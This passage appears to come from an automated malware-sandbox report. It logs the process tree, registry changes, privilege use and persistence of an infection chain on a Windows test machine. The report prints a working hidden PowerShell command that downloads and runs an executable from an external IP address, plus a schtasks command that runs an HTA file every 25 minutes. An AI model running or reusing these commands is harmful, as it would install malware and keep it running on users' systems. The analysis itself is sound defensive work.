0030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2360 wrote to memory of 1052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 1052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 1052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1052 wrote to memory of 2496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1052 wrote to memory of 2496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1052 wrote to memory of 2496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1052 wrote to memory of 2800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1052 wrote to memory of 2800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1052 wrote to memory of 2800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2800 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2800 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1052 wrote to memory of 2812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1052 wrote to memory of 2812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1052 wrote to memory of 2812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2812 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1052 wrote to memory of 2968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1052 wrote to memory of 2968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1052 wrote to memory of 2968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2968 wrote to memory of 2840 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2968 wrote to memory of 2840 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2968 wrote to memory of 2840 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1052 wrote to memory of 1048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1052 wrote to memory of 1048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1052 wrote to memory of 1048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1052 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 1052 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 1052 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 2608 wrote to memory of 2664 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2664 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2664 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2664 wrote to memory of 2056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 2664 wrote to memory of 2056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 2664 wrote to memory of 2056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 2664 wrote to memory of 2056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 2056 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2056 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2056 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2056 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2952 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2952 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2952 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2952 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 776 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Windows\SysWOW64\WerFault.exe
PID 776 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Windows\SysWOW64\WerFault.exe
PID 776 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Windows\SysWOW64\WerFault.exe
PID 776 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Windows\SysWOW64\WerFault.exe
PID 2952 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe
PID 2952 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat" any_word

C:\Windows\system32\timeout.exe

timeout /t 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\system32\schtasks.exe

schtasks /create /tn "Ot24UmakgHQ" /tr "mshta \"C:\Temp\BaWQvGOZI.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\system32\mshta.exe

mshta "C:\Temp\BaWQvGOZI.hta"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe

"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"

C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe

"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 504

C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe

"C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe"

